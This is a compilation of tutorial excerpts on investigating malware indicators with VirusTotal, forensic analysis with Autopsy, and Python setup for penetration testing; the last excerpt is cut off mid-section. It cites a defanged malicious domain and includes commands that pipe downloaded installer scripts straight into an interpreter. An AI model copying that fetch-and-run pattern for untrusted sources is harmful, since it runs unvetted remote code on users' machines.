
How-To Tutorials - Security


Mastering Threat Detection with VirusTotal: A Guide for SOC Analysts

Mostafa Yahia
11 Nov 2024
15 min read
This article is an excerpt from the book "Effective Threat Investigation for SOC Analysts" by Mostafa Yahia, a practical guide that enables SOC professionals to analyze the most common security appliance logs found in any environment.

Introduction

In today's cybersecurity landscape, threat detection and investigation are essential for defending against sophisticated attacks. VirusTotal, a powerful Threat Intelligence Platform (TIP), provides security analysts with robust tools to analyze suspicious files, domains, URLs, and IP addresses. Leveraging VirusTotal's extensive security database and community-driven insights, SOC analysts can efficiently detect potential malware and other cyber threats. This article delves into the ways VirusTotal empowers analysts to investigate suspicious digital artifacts and enhance their organization's security posture, focusing on critical features such as file analysis, domain reputation checks, and URL scanning.

Investigating threats using VirusTotal

VirusTotal is a Threat Intelligence Platform (TIP) that allows security analysts to analyze suspicious files, hashes, domains, IPs, and URLs to detect and investigate malware and other cyber threats. Moreover, VirusTotal is known for its robust automation capabilities, which allow for the automatic sharing of this intelligence with the broader security community. See Figure 14.1:

Figure 14.1 – The VirusTotal platform main web page

VirusTotal scans submitted artifacts, such as hashes, domains, URLs, and IPs, against more than 88 security solutions' signature and intelligence databases. As a SOC analyst, you should use the VirusTotal platform to investigate the following:

- Suspicious files
- Suspicious domains and URLs
- Suspicious outbound IPs

Investigating suspicious files

VirusTotal allows cybersecurity analysts to analyze suspicious files either by uploading the file or by searching for the file hash's reputation.
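A hash lookup can also be automated. The sketch below queries a file hash's reputation through VirusTotal's public v3 REST API (GET /api/v3/files/{hash} with an x-apikey header); the helper names and the API key placeholder are our own, and a valid key is required for the actual request.

```python
# Sketch: querying a file hash's reputation via the VirusTotal v3 REST API.
# The endpoint shape (GET /api/v3/files/{hash}, "x-apikey" header) follows
# the public v3 API; the helper names and API key placeholder are our own.
import json
import urllib.request

VT_BASE = "https://www.virustotal.com/api/v3"

def vt_report_url(ioc_type: str, ioc: str) -> str:
    """Build the v3 report URL for a file hash, domain, or IP."""
    paths = {"file": "files", "domain": "domains", "ip": "ip_addresses"}
    return f"{VT_BASE}/{paths[ioc_type]}/{ioc}"

def fetch_report_stats(ioc_type: str, ioc: str, api_key: str) -> dict:
    """Fetch a report and return per-verdict engine counts."""
    req = urllib.request.Request(vt_report_url(ioc_type, ioc),
                                 headers={"x-apikey": api_key})
    with urllib.request.urlopen(req) as resp:
        data = json.load(resp)
    # last_analysis_stats summarizes verdicts across all scanning engines
    return data["data"]["attributes"]["last_analysis_stats"]

# Example (requires a valid API key):
# stats = fetch_report_stats("file", "<sha256-of-suspicious-file>", "YOUR_KEY")
# print(stats["malicious"], "engines flagged the file")
```

Building the lookup into a script lets an analyst triage a whole list of hashes instead of pasting them into the web form one by one.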
Whether you upload a file or submit a file hash for analysis, VirusTotal scans it against multiple antivirus signature databases and predefined YARA rules, and analyzes the file's behavior in different sandboxes. After the analysis of the submitted file is completed, VirusTotal provides analysts with general information about the analyzed file in five tabs; each tab contains a wealth of information. See Figure 14.2:

Figure 14.2 – The details and tabs provided by analyzing a file on VirusTotal

As you see in the preceding figure, after submitting the file to the VirusTotal platform for analysis, the file was analyzed against multiple vendors' antivirus signature databases, Sigma detection rules, IDS detection rules, and several sandboxes for dynamic analysis.

The preceding figure is the first page provided by VirusTotal after submitting the file. The first section shows the most common name of the submitted file, the file hash, the number of antivirus vendors and sandboxes that flagged the submitted hash as malicious, and tags for the suspicious activities the file performed when detonated in the sandboxes, such as the persistence tag, which means that the executable tried to maintain persistence. See Figure 14.3:

Figure 14.3 – The first section of the first page from VirusTotal when analyzing a file

The first of the five tabs provided by the VirusTotal platform is the DETECTION tab. The first parts of the DETECTION tab include the matched Sigma rules, IDS rules, and dynamic analysis results from the sandboxes. See Figure 14.4:

Figure 14.4 – The first parts of the DETECTION tab

Sigma rules are threat detection rules designed to analyze system logs. Sigma was built to enable collaboration between SOC teams, as it allows them to share standardized detection rules, regardless of the SIEM in place, to detect various threats using event logs.
VirusTotal sandboxes store all event logs generated during file detonation, and these logs are later tested against the Sigma rules collected from different repositories. VirusTotal users will find the list of Sigma rules matching a submitted file in the DETECTION tab. As you can see in the preceding figure, the executed file performed certain actions that were identified by running the Sigma rules against the sandbox logs. Specifically, it disabled the Defender service, created an Auto-Start Extensibility Point (ASEP) entry to maintain persistence, and created another executable.

As can also be observed, VirusTotal shows that the Intrusion Detection System (IDS) rules successfully detected the Redline info-stealer malware's Command and Control (C&C) communications, which matched four IDS rules.

Important note: Both Sigma and IDS rules are assigned a severity level, and analysts can easily view each matched rule as well as the number of matches.

Following the IDS rule matches, you will find the dynamic sandboxes' detections of the submitted file. In this case, the sandboxes categorized the submitted file/hash as info-stealer malware. Finally, the last part of the DETECTION tab is the Security vendors' analysis. See Figure 14.5:

Figure 14.5 – The Security vendors' analysis section

As you see in the preceding figure, the submitted file or hash is flagged as malicious by several security vendors, and most of them label the given file as Redline info-stealer malware.

The second tab is the DETAILS tab, which includes the Basic properties section for the given file, covering the file hashes, file type, and file size. The tab also includes timestamps such as the file creation, first submission, last submission, and last analysis times. Additionally, this tab provides analysts with all the filenames associated with previous submissions of the same file.
See Figure 14.6:

Figure 14.6 – The first three sections of the DETAILS tab

Moreover, the DETAILS tab provides analysts with useful information such as signature verification, enabling identification of whether the file is digitally signed, a key indicator of its authenticity and trustworthiness. Additionally, the tab presents crucial insights into the imported Dynamic Link Libraries (DLLs) and called functions, allowing analysts to understand the file's intent.

The third tab is the RELATIONS tab, which includes the IoCs of the analyzed file, such as the domains and IPs that the file communicated with, the files bundled with the executable, and the files dropped by the executable. See Figure 14.7:

Figure 14.7 – The RELATIONS tab

Important note: When analyzing a malicious file, you can use the connected IPs and domains to scope the infection in your environment by using network security system logs, such as firewall and proxy logs. However, not all of the connected IPs and domains are necessarily malicious; some may be legitimate domains or IPs abused by the malware for malicious purposes.

At the bottom of the RELATIONS tab, VirusTotal provides a graph that binds the given file and all of its relations together, which should facilitate your investigations. To maximize the graph in a new tab, click on it. See Figure 14.8:

Figure 14.8 – VT Relations graph

The fourth tab is the BEHAVIOR tab, which contains the detailed sandbox analysis of the submitted file. This report is presented in a structured format and includes the tags, the MITRE ATT&CK tactics and techniques conducted by the executed file, matched IDS and Sigma rules, dropped files, network activities, and the process tree observed during the analysis of the given file.
See Figure 14.9:

Figure 14.9 – The BEHAVIOR tab

Regardless of the matched signatures from security vendors, Sigma rules, and IDS rules, the BEHAVIOR tab allows analysts to examine the file's actions and behavior to determine whether it is malicious. This feature is especially critical when investigating zero-day malware, where traditional signature-based detection methods may not be effective and in-depth behavior analysis is required to identify and respond to potential threats.

The fifth tab is the COMMUNITY tab, which allows analysts to contribute their thoughts to the VirusTotal community and to read community members' thoughts regarding the given file. See Figure 14.10:

Figure 14.10 – The COMMUNITY tab

As you can see, we have two comments from two sandbox vendors indicating that the file is malicious and, according to its behavior during dynamic analysis, belongs to the Redline info-stealer family.

Investigating suspicious domains and URLs

A SOC analyst may depend on the VirusTotal platform to investigate suspicious domains and URLs. You can analyze a suspicious domain or URL on the VirusTotal platform by entering it into either the URL or Search form.

In the Investigating suspicious files section, we noticed while navigating the RELATIONS tab that the file had established communication with the hueref[.]eu domain. In this section, we will investigate the hueref[.]eu domain by using the VirusTotal platform. See Figure 14.11:

Figure 14.11 – The DETECTION tab

Upon submitting the suspicious domain to the Search form in VirusTotal, it was discovered that the domain had several tags indicating potential security risks. These tags refer to the web domain's category. As you can see in the preceding screenshot, there are two tags indicating that the domain is malicious.

The first tab provided is the DETECTION tab, which includes the Security vendors' analysis.
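Note that the domain above is written as hueref[.]eu: IoCs are usually "defanged" in reports so they cannot be accidentally clicked or auto-linked. A minimal sketch of the convention (the helper names are our own) looks like this:

```python
# Sketch: "defanging" indicators such as hueref[.]eu prevents accidental
# clicks or auto-linking when sharing IoCs in reports and tickets.
# These helper names are our own.
def defang(indicator: str) -> str:
    """Replace dots/schemes so the indicator is no longer clickable."""
    return indicator.replace("http://", "hxxp://") \
                    .replace("https://", "hxxps://") \
                    .replace(".", "[.]")

def refang(indicator: str) -> str:
    """Restore a defanged indicator before submitting it to a TIP."""
    return indicator.replace("hxxp://", "http://") \
                    .replace("hxxps://", "https://") \
                    .replace("[.]", ".")

print(defang("hueref.eu"))    # hueref[.]eu
print(refang("hueref[.]eu"))  # hueref.eu
```

Remember to refang before pasting an indicator into VirusTotal's Search form, since the platform expects the real domain or URL.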
In this case, several security vendors labeled the domain as Malware or a Malicious domain.

The second tab is the DETAILS tab, which includes information about the given domain, such as the web domain categories from different sources, the last DNS records of the domain, and the domain's Whois lookup results. See Figure 14.12:

Figure 14.12 – The DETAILS tab

The third tab is the RELATIONS tab, which provides analysts with all of the domain's relations, such as the IP(s) the domain resolves to, along with their reputations, and the files that communicated with the given domain when previously analyzed in the VirusTotal sandboxes, along with their reputations. See Figure 14.13:

Figure 14.13 – The RELATIONS tab

The RELATIONS tab is very useful, especially when investigating potential zero-day malicious domains that have not yet been detected and flagged by security vendors. By analyzing the domain's resolving IP(s) and their reputations, as well as any connections between the domain and previously analyzed malicious files on the VT platform, SOC analysts can quickly and accurately identify potential threats, such as a likely C&C server domain.

At the bottom of the RELATIONS tab, you will find the same VirusTotal graph discussed in the previous section. The fourth tab is the COMMUNITY tab, which allows you to contribute your thoughts to the VirusTotal community and read community members' thoughts regarding the given domain.

Investigating suspicious outbound IPs

As a security analyst, you may depend on the VirusTotal platform to investigate suspicious outbound IPs that your internal systems may have communicated with. By entering the IP into the Search form, the VirusTotal platform will show you nearly the same tabs and details provided when analyzing domains in the last section. In this section, we will investigate the IP of the hueref[.]eu domain.
As we mentioned, the tabs and details provided by VirusTotal when analyzing an IP are the same as those provided when analyzing a domain. Moreover, the RELATIONS tab in VirusTotal provides all the domains hosted on the IP and their reputations. See Figure 14.14:

Figure 14.14 – Domains hosted on the same IP and their reputations

Important note: It is not advisable to depend on the VirusTotal platform to investigate suspicious inbound IPs, such as port-scanning or vulnerability-scanning IPs. This is because VirusTotal relies on the reputation assessments provided by security vendors, which are most effective at detecting malicious outbound IPs, such as those associated with C&C servers or phishing activities.

By the end of this section, you should have learned how to investigate suspicious files, domains, and outbound IPs by using the VirusTotal platform.

Conclusion

In conclusion, VirusTotal is an invaluable resource for SOC analysts, enabling them to streamline threat investigations by analyzing artifacts through multiple detection engines and sandbox environments. From identifying malicious file behavior to assessing suspicious domains and URLs, VirusTotal's capabilities offer comprehensive insights into potential threats. By integrating this tool into daily workflows, security professionals can make data-driven decisions that enhance response times and threat mitigation strategies. Ultimately, VirusTotal not only assists in pinpointing immediate risks but also contributes to a collaborative, community-driven approach to cybersecurity.

Author Bio

Mostafa Yahia is a passionate threat investigator and hunter who has hunted and investigated several cyber incidents. His experience includes building and leading cybersecurity managed services such as SOC and threat-hunting services. He earned a bachelor's degree in computer science in 2016. Additionally, Mostafa holds the following certifications: GCFA, GCIH, CCNA, IBM QRadar, and FireEye System Engineer. Mostafa also provides free courses and lessons through his YouTube channel. Currently, he is the cyber defense services senior leader for SOC, threat hunting, DFIR, and compromise assessment services at an MSSP company.


Getting started with Digital forensics using Autopsy

Savia Lobo
24 May 2018
10 min read
Digital forensics involves the preservation, acquisition, documentation, analysis, and interpretation of evidence from various storage media types. It is not limited to laptops, desktops, tablets, and mobile devices, but also extends to data in transit transmitted across public or private networks. In this tutorial, we will cover how to carry out digital forensics with Autopsy. Autopsy is a digital forensics platform and graphical interface to The Sleuth Kit and other digital forensics tools. This article is an excerpt taken from the book 'Digital Forensics with Kali Linux', written by Shiva V.N. Parasram.

Let's proceed with the analysis using the Autopsy browser by first getting acquainted with the different ways to start Autopsy.

Starting Autopsy

Autopsy can be started in two ways. The first uses the Applications menu: click on Applications | 11 - Forensics | autopsy. Alternatively, we can click on the Show applications icon (the last item in the side menu), type autopsy into the search bar at the top-middle of the screen, and then click on the autopsy icon.

Once the autopsy icon is clicked, a new terminal opens showing the program information along with connection details for opening the Autopsy Forensic Browser. In the following screenshot, we can see that the version number is listed as 2.24, with the path to the Evidence Locker folder as /var/lib/autopsy. To open the Autopsy browser, position the mouse over the link in the terminal, then right-click and choose Open Link, as seen in the following screenshot.

Creating a new case

To create a new case, follow the given steps:

When the Autopsy Forensic Browser opens, investigators are presented with three options. Click on NEW CASE. Enter details for the Case Name, Description, and Investigator Names. For the Case Name, I've entered SP-8-dftt, as it closely matches the image name (8-jpeg-search.dd), which we will be using for this investigation.
Once all information is entered, click NEW CASE. Several investigator name fields are available, as there may be instances where several investigators are working together.

The locations of the Case directory and Configuration file are displayed and shown as created. It's important to take note of the case directory location, as seen in the screenshot: Case directory (/var/lib/autopsy/SP-8-dftt/) created. Click ADD HOST to continue.

Enter the details for the Host Name (the name of the computer being investigated) and the Description of the host. Optional settings:

- Time zone: Defaults to local settings, if not specified
- Timeskew Adjustment: Adds a value in seconds to compensate for time differences
- Path of Alert Hash Database: Specifies the path of a created database of known bad hashes
- Path of Ignore Hash Database: Specifies the path of a created database of known good hashes, similar to the NIST NSRL

Click on the ADD HOST button to continue. Once the host is added and the directories are created, we add the forensic image we want to analyze by clicking the ADD IMAGE button, then click on the ADD IMAGE FILE button to add the image file.

To import the image for analysis, the full path must be specified. On my machine, I've saved the image file (8-jpeg-search.dd) to the Desktop folder. As such, the location of the file would be /root/Desktop/8-jpeg-search.dd. For the Import Method, we choose Symlink. This way, the image file can be imported from its current location (Desktop) to the Evidence Locker without the risks associated with moving or copying the image file. If you are presented with the following error message, ensure that the specified image location is correct and that the forward slash (/) is used.

Upon clicking Next, the Image File Details are displayed. To verify the integrity of the file, select the radio button for Calculate the hash value for this image, and select the checkbox next to Verify hash after importing?
The File System Details section also shows that the image is of an NTFS partition. Click on the ADD button to continue. After clicking the ADD button in the previous screenshot, Autopsy calculates the MD5 hash and links the image into the Evidence Locker. Press OK to continue.

At this point, we're just about ready to analyze the image file. If there are multiple cases listed in the gallery area from any previous investigations you may have worked on, be sure to choose the 8-jpeg-search.dd file and case.

Before proceeding, we can click on the IMAGE DETAILS option. This screen gives details such as the image name, volume ID, file format, and file system, and also allows for the extraction of ASCII, Unicode, and unallocated data to enhance and speed up keyword searches. Click on the back button in the browser to return to the previous menu and continue with the analysis.

Before clicking on the ANALYZE button to start our investigation and analysis, we can also verify the integrity of the image by creating an MD5 hash: click on the IMAGE INTEGRITY button. Several other options exist, such as FILE ACTIVITY TIMELINES, HASH DATABASES, and so on; we can return to these at any point in the investigation.

After clicking on the IMAGE INTEGRITY button, the image name and hash are displayed. Click on the VALIDATE button to validate the MD5 hash. The validation results are displayed in the lower-left corner of the Autopsy browser window. We can see that our validation was successful, with matching MD5 hashes displayed in the results. Click on the CLOSE button to continue.

To begin our analysis, we click on the ANALYZE button.

Analysis using Autopsy

Now that we've created our case, added host information with appropriate directories, and added our acquired image, we get to the analysis stage.
After clicking on the ANALYZE button (see the previous screenshot), we're presented with several options in the form of tabs with which to begin our investigation. Let's look at the details of the image by clicking on the IMAGE DETAILS tab. In the following snippet, we can see the Volume Serial Number and the operating system (Version) listed as Windows XP.

Next, we click on the FILE ANALYSIS tab. This mode opens into File Browsing Mode, which allows the examination of directories and files within the image. Directories within the image are listed by default in the main view area. In File Browsing Mode, directories are listed with the Current Directory specified as C:/. For each directory and file, there are fields showing when the item was WRITTEN, ACCESSED, CHANGED, and CREATED, along with its size and META data:

- WRITTEN: The date and time the file was last written to
- ACCESSED: The date and time the file was last accessed (only the date is accurate)
- CHANGED: The date and time the descriptive data of the file was modified
- CREATED: The date and time the file was created
- META: Metadata describing the file and information about the file

For integrity purposes, MD5 hashes of all files can be made by clicking on the GENERATE MD5 LIST OF FILES button. Investigators can also make notes about files, times, anomalies, and so on by clicking on the ADD NOTE button.

The left pane contains four main features that we will be using:

- Directory Seek: Allows for the searching of directories
- File Name Search: Allows for the searching of files by Perl expressions or filenames
- ALL DELETED FILES: Searches the image for deleted files
- EXPAND DIRECTORIES: Expands all directories for easier viewing of contents

By clicking on EXPAND DIRECTORIES, all contents are easily viewable and accessible within the left pane and main window.
The + next to a directory indicates that it can be further expanded to view subdirectories (++) and their contents. To view deleted files, we click on the ALL DELETED FILES button in the left pane. Deleted files are marked in red and adhere to the same format of WRITTEN, ACCESSED, CHANGED, and CREATED times. From the following screenshot, we can see that the image contains two deleted files.

We can view more information about a file by clicking on its META entry (the last column to the right), which also lets us view the hexadecimal content of the file; this may reveal the true file type, even if the extension was changed. In the preceding screenshot, the second deleted file (file7.hmm) has a peculiar file extension of .hmm. Click on the META entry (31-128-3) to view the metadata; then, under the Attributes section, click on the first cluster, labelled 1066, to view the header information of the file. We can see that the first entry is JFIF, which is an abbreviation for JPEG File Interchange Format. This means that the file7.hmm file is an image file whose extension was changed to .hmm.

Sorting files

Inspecting the metadata of each file may not be practical with large evidence files. For such instances, the FILE TYPE feature can be used. This feature allows for the examination of existing (allocated), deleted (unallocated), and hidden files. Click on the FILE TYPE tab to continue. Click Sort files into categories by type (leave the default-checked options as they are) and then click OK to begin the sorting process. Once sorting is complete, a results summary is displayed. In the following snippet, we can see that there are five Extension Mismatches.

To view the sorted files, we must manually browse to the location of the output folder, as Autopsy 2.4 does not support viewing of sorted files.
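The header inspection we did manually for file7.hmm can be scripted: read a file's leading "magic bytes" and compare them against known signatures. The sketch below uses a small illustrative subset of signatures; real tools such as `file`/libmagic know thousands.

```python
# Sketch: identifying a file's true type from its header bytes, as done
# manually for file7.hmm above. The signature table is a small illustrative
# subset; real tools (e.g. `file`, libmagic) know far more signatures.
SIGNATURES = {
    b"\xff\xd8\xff": "jpeg",          # JPEG/JFIF images start with FF D8 FF
    b"\x89PNG\r\n\x1a\n": "png",
    b"PK\x03\x04": "zip",             # also docx/xlsx/apk containers
    b"MZ": "windows executable",
}

def sniff_type(path: str) -> str:
    """Return a best-guess file type from the leading magic bytes."""
    with open(path, "rb") as f:
        header = f.read(16)
    for magic, ftype in SIGNATURES.items():
        if header.startswith(magic):
            return ftype
    return "unknown"

# A renamed JPEG such as file7.hmm would still be reported as "jpeg".
```

Comparing the sniffed type against the file's extension gives exactly the kind of extension-mismatch report that Autopsy's FILE TYPE sorter produces.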
To reveal this location, click on View Sorted Files in the left pane. The output folder locations will vary depending on the information specified by the user when first creating the case, but can usually be found at /var/lib/autopsy/<case name>/<host name>/output/sorter-vol#/index.html. Once the index.html file has been opened, click on the Extension Mismatch link. The five listed files with mismatched extensions should be further examined by viewing their metadata content, with notes added by the investigator.

Reopening cases in Autopsy

Cases are usually ongoing and can easily be restarted by starting Autopsy and clicking on OPEN CASE. In the CASE GALLERY, be sure to choose the correct case name and, from there, continue your examination.

To recap, we looked at forensics using the Autopsy Forensic Browser with The Sleuth Kit. Compared to individual tools, Autopsy has case management features and supports various types of file analysis, searching, and sorting of allocated, unallocated, and hidden files. Autopsy can also perform hashing at the file and directory levels to maintain evidence integrity.

If you enjoyed reading this article, do check out 'Digital Forensics with Kali Linux' to take your forensic abilities and investigations to a professional level, catering to all aspects of a digital forensic investigation, from hashing to reporting. Related reads:

- What is Digital Forensics?
- IoT Forensics: Security in an always connected world where things talk
- Working with Forensic Evidence Container Recipes


Python Scripting Essentials

Packt
17 May 2016
15 min read
In this article by Rejah Rehim, author of the book Mastering Python Penetration Testing, we will cover:

- Setting up the scripting environment in different operating systems
- Installing third-party Python libraries
- Working with virtual environments
- Python language basics

Python is still the leading language in the world of penetration testing (pentesting) and information security. Python-based tools include all kinds of tools used for inputting massive amounts of random data to find errors and security loopholes, proxies, and even exploit frameworks. If you are interested in tinkering with pentesting tasks, Python is the best language to learn because of its large number of reverse engineering and exploitation libraries.

Over the years, Python has received numerous updates and upgrades. For example, Python 2 was released in 2000 and Python 3 in 2008. Unfortunately, Python 3 is not backward compatible; hence, most of the programs written in Python 2 will not work in Python 3. Even though Python 3 was released in 2008, most libraries and programs still use Python 2. To do better penetration testing, the tester should be able to read, write, and rewrite Python scripts.

As a scripting language, Python has been the preferred language for security experts developing security toolkits. Its human-readable code, modular design, and large number of libraries provide a starting point for security experts and researchers to create sophisticated tools with it. Python comes with a vast standard library that accommodates almost everything from simple I/O to platform-specific API calls. Many of the default and user-contributed libraries and modules can help us in penetration testing by building tools to achieve interesting tasks.

Setting up the scripting environment

Your scripting environment is basically the computer you use for your daily work, combined with all the tools in it that you use to write and run Python programs.
The best system to learn on is the one you are using right now. This section will help you configure the Python scripting environment on your computer so that you can create and run your own programs.

If you are using a Mac OS X or Linux installation on your computer, you may have a Python interpreter pre-installed. To find out if you have one, open a terminal and type python. You will probably see something like this:

$ python
Python 2.7.6 (default, Mar 22 2014, 22:59:56)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

From the preceding output, we can see that Python 2.7.6 is installed on this system. By issuing python in your terminal, you started the Python interpreter in interactive mode. Here, you can play around with Python commands; what you type will run and you'll see the output immediately.

You can use your favorite text editor to write your Python programs. If you do not have one, try installing Geany or Sublime Text; either should be perfect for you. These are simple editors that offer a straightforward way to write as well as run your Python programs. In Geany, the output is shown in a separate terminal window, whereas Sublime Text uses an embedded terminal window. Sublime Text is not free, but it has a flexible trial policy that allows you to use the editor without any restriction. It is one of the few cross-platform text editors that is quite apt for beginners and has a full range of functions targeting professionals.

Setting up in Linux

Linux is built in a way that makes it smooth for users to get started with Python programming. Most Linux distributions already have Python installed. For example, the latest versions of Ubuntu and Fedora come with Python 2.7, and the latest versions of Red Hat Enterprise Linux (RHEL) and CentOS come with Python 2.6. Just for the record, you might want to check it.
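Besides reading the interpreter banner, you can check the version from inside Python itself, which is useful at the top of scripts that must behave differently on Python 2 and 3. A small sketch:

```python
# Sketch: checking the interpreter version from inside Python rather than
# reading the startup banner. Useful in scripts that support both 2 and 3.
import sys

print(sys.version)  # full banner string, e.g. "2.7.6 (default, ...)"
major, minor = sys.version_info[0], sys.version_info[1]
print("Running Python %d.%d" % (major, minor))

if major == 2:
    print("Python 2 interpreter: most legacy pentesting tools target this")
```

The `%`-style formatting is used deliberately so the snippet runs unchanged on both major versions.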
If it is not installed, the easiest way to install Python is to use your distribution's default package manager, such as apt-get, yum, and so on. Install Python by issuing the following commands in the terminal.

For Debian / Ubuntu / Kali Linux users:

sudo apt-get install python2

For Red Hat / RHEL / CentOS Linux users:

sudo yum install python

To install Geany, leverage your distribution's package manager.

For Debian / Ubuntu / Kali Linux users:

sudo apt-get install geany geany-common

For Red Hat / RHEL / CentOS Linux users:

sudo yum install geany

Setting up in Mac

Even though the Macintosh is a good platform to learn Python, many people using Macs actually run some Linux distribution on their computer or run Python within a virtual Linux machine. The latest version of Mac OS X, Yosemite, comes with Python 2.7 preinstalled. Once you verify that it is working, install Sublime Text.

For Python to run on your Mac, you have to install GCC, which can be obtained by downloading Xcode or the smaller command-line tools package. Also, we need to install Homebrew, a package manager. To install Homebrew, open Terminal and run the following:

$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

After installing Homebrew, you have to insert the Homebrew directory into your PATH environment variable. You can do this by including the following line in your ~/.profile file:

export PATH=/usr/local/bin:/usr/local/sbin:$PATH

Now we are ready to install Python 2.7; run the following command in your terminal and it will do the rest:

$ brew install python

To install Sublime Text, go to Sublime Text's downloads page at http://www.sublimetext.com/3 and click on the OS X link. This will get you the Sublime Text installer for your Mac.

Setting up in Windows

Windows does not have Python preinstalled. To check whether it is installed, open a command prompt, type the word python, and press Enter.
In most cases, you will get a message that says Windows does not recognize python as a command. We have to download an installer that will set up Python for Windows, and then install and configure Geany to run Python programs.

Go to Python's download page at https://www.python.org/downloads/windows/ and download the Python 2.7 installer that is compatible with your system. If you are not aware of your operating system's architecture, download the 32-bit installer, which will work on both architectures; the 64-bit installer will only work on 64-bit systems.

To install Geany, go to Geany's download page at http://www.geany.org/Download/Releases and download the full installer variant, which has the description Full Installer including GTK 2.16.

By default, Geany doesn't know where Python resides on your system, so we need to configure it manually. For this, write a Hello World program in Geany, save it anywhere on your system as hello.py, and run it. There are three methods to run a Python program in Geany:

- Select Build | Execute
- Press F5
- Click the icon with three gears on it

When you have a running hello.py program in Geany, go to Build | Set Build Commands. Then, fill in the compile command option with C:\Python27\python -m py_compile "%f" and the execute command with C:\Python27\python "%f". Now, you can run your Python programs while coding in Geany.

It is recommended to run a Kali Linux distribution as a virtual machine and use this as your scripting environment. Kali Linux comes with a number of tools preinstalled and is based on Debian Linux, so you'll also be able to install a wide variety of additional tools and libraries. Also, some of the libraries will not work properly on Windows systems.

Installing third-party libraries

We will be using many Python libraries, and this section will help you install and use third-party libraries.

Setuptools and pip

One of the most useful pieces of third-party Python software is Setuptools.
With Setuptools, you can download and install any compliant Python library with a single command. The best way to install Setuptools on any system is to download the ez_setup.py file from https://bootstrap.pypa.io/ez_setup.py and run it with your Python installation.

On Linux, run this in a terminal with the correct path to the ez_setup.py script:

sudo python path/to/ez_setup.py

For Windows 8, or older versions of Windows with PowerShell 3 installed, start PowerShell with administrative privileges and run this command in it:

> (Invoke-WebRequest https://bootstrap.pypa.io/ez_setup.py).Content | python -

For Windows systems without PowerShell 3 installed, download the ez_setup.py file from the link provided previously using your web browser and run it with your Python installation.

pip is a package management system used to install and manage software packages written in Python. After the successful installation of Setuptools, you can install pip by simply opening a command prompt and running the following:

$ easy_install pip

Alternatively, you can install pip using your distribution's default package manager:

On Debian, Ubuntu, and Kali Linux: sudo apt-get install python-pip

On Fedora: sudo yum install python-pip

Now you can run pip from the command line. Try installing a package with pip:

$ pip install packagename

Working with virtual environments

Virtual environments help separate the dependencies required for different projects; by working inside a virtual environment, we also keep our global site-packages directory clean.

Using virtualenv and virtualenvwrapper

virtualenv is a Python module that helps create isolated Python environments for each of our scripting experiments. It creates a folder with all the necessary executable files and modules for a basic Python project.
You can install virtualenv with the following command:

sudo pip install virtualenv

To create a new virtual environment, create a folder and enter it from the command line:

$ cd your_new_folder
$ virtualenv name-of-virtual-environment

This will initiate a folder with the provided name in your current working directory, containing all the Python executable files and the pip library, which will then help install other packages in your virtual environment. You can select a Python interpreter of your choice by providing an extra parameter, as in the following command:

$ virtualenv -p /usr/bin/python2.7 name-of-virtual-environment

This will create a virtual environment with Python 2.7. We have to activate it before we start using it:

$ source name-of-virtual-environment/bin/activate

Now, the name of the active virtual environment will appear on the left-hand side of the command prompt. Any package that you install inside this prompt using pip will belong to the active virtual environment, isolated from all other virtual environments and the global installation. You can deactivate and exit the current virtual environment using this command:

$ deactivate

virtualenvwrapper provides a better way to use virtualenv. It also organizes all the virtual environments in one place. To install it, we can use pip, but let's make sure we have installed virtualenv first.

Linux and OS X users can install it with the following method:

$ pip install virtualenvwrapper

Also, add these three lines to your shell startup file, such as .bashrc or .profile:

export WORKON_HOME=$HOME/.virtualenvs
export PROJECT_HOME=$HOME/Devel
source /usr/local/bin/virtualenvwrapper.sh

This will set the Devel folder in your home directory as the location of your virtual environment projects.

For Windows users, there is another package, virtualenvwrapper-win. It can also be installed with pip.
pip install virtualenvwrapper-win

Create a virtual environment with virtualenvwrapper:

$ mkvirtualenv your-project-name

This creates a folder with the provided name inside ~/Envs. To activate this environment, we can use the workon command:

$ workon your-project-name

These two commands can be combined into a single one, as follows:

$ mkproject your-project-name

We can deactivate the virtual environment with the same deactivate command as in virtualenv. To delete a virtual environment, we can use the following command:

$ rmvirtualenv your-project-name

Python language essentials

In this section, we will go through the ideas of variables, strings, data types, networking, and exception handling. For an experienced programmer, this section will be just a summary of what you already know about Python.

Variables and types

Python is brilliant in the case of variables: a variable points to data stored in a memory location. This memory location may contain different values, such as integers, real numbers, Booleans, strings, lists, and dictionaries. Python interprets and declares variables when you set some value to a variable. For example, if we set:

a = 1 and b = 2

then we print the sum of these two variables with:

print (a+b)

The result will be 3, as Python figures out that both a and b are numbers. However, if we had assigned:

a = "1" and b = "2"

then the output will be 12, since both a and b will be treated as strings. We do not have to declare variables or their types before using them, as each variable is an object. The type() method can be used to get the variable type.

Strings

As in any other programming language, strings are one of the important things in Python. They are immutable, so they cannot be changed once they are defined. There are many Python methods that can modify a string; they do nothing to the original one, but create a modified copy and return it.
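The point above, that string methods return copies rather than modifying the string in place, is easy to verify along with the type() behavior just described. This short snippet runs unchanged on Python 2 and 3:

```python
# type() reports the class of the object a name points to
a = 1
b = "1"
print(type(a))  # an int; the printed form differs slightly between Python 2 and 3
print(type(b))

# String methods return a new string; the original is untouched
s = "Python"
t = s.upper()
print(t)  # PYTHON
print(s)  # Python -- still unchanged, because strings are immutable
```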
Strings can be delimited with single quotes, double quotes, or, in the case of multiple lines, triple quotes. We can use the backslash (\) character to escape additional quotes that come inside a string. Commonly used string methods are:

string.count('x'): This returns the number of occurrences of 'x' in the string
string.find('x'): This returns the position of the character 'x' in the string
string.lower(): This converts the string into lowercase
string.upper(): This converts the string into uppercase
string.replace('a', 'b'): This replaces all occurrences of 'a' with 'b' in the string

Also, we can get the number of characters, including white spaces, in a string with the len() method:

#!/usr/bin/python
a = "Python"
b = "Python\n"
c = "Python"
print len(a)
print len(b)
print len(c)

You can read more about the string functions at https://docs.python.org/2/library/string.html.

Lists

Lists allow us to store more than one variable and provide a better method for sorting arrays of objects in Python. They also have methods that help to manipulate the values inside them:

list = [1,2,3,4,5,6,7,8]
print (list[1])

This will print 2, as Python indexes start from 0. To print out the whole list:

list = [1,2,3,4,5,6,7,8]
for x in list:
    print (x)

This will loop through all the elements and print them. Useful list methods are:

.append(value): This appends an element at the end of the list
.count('x'): This gets the number of 'x' elements in the list
.index('x'): This returns the index of 'x' in the list
.insert('y','x'): This inserts 'x' at location 'y'
.pop(): This returns the last element and also removes it from the list
.remove('x'): This removes the first 'x' from the list
.reverse(): This reverses the elements in the list
.sort(): This sorts the list alphabetically, or numerically, in ascending order

Dictionaries

A Python dictionary is a storage method for key:value pairs. In Python, dictionaries are enclosed in curly braces, {}.
For example:

